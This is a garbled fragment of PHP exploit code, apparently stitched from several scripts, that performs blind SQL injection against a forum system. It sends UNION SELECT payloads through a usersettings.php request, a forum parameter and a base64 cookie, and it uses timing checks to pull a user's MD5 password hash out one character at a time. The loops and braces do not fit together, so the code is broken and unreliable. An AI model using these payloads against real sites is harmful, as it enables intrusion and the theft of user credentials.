$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_len .= chr($i);
print chr($i);
break;
}
}
}
$fh = @fopen($InterestingFile, 'w+');
fwrite($fh, "<?php ?>");
fclose($fh);
for ($i = 1; $i < 256; $i++) {
$chri = chr($i);
for ($j = 0; $j < 256; $j++) {
$chrj = chr($j);
for ($k = 0; $k < 256; $k++) {
$chrk = chr($k);
if($chri.$chrj.$chrk == '://') continue;
die("\n[!] wrong table prefix!");
}
$l=xtrct_lnk($_o);
if ($l==$_lnks[0]){
$f=true;
$_hash.=chr($i);
print chr($i); break;
}
}
}
if ($f==false){
$sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR 1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
$url = "http://$host:$port".$path."usersettings.php";
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
if (is_checked()) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
#if found , uncheck again
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
break;
}
if (chk_err($out)) {
die("[!] sql error.");
}
if ($difftime > ($n-1)) {
$f = true;
$_hash .= chr($i);
print "[?] hash: ".$_hash."[??]\n";
sleep($n);
break;
}
}
//uid is mediumint, so if you assign a string value to it you have an sql error, so the script fails hence true/fails questions and you bypass speed limit also
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ".$prefix."users WHERE $where LIMIT 1/*";
$out = _s($url, base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($out)) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
break;
}
}
}
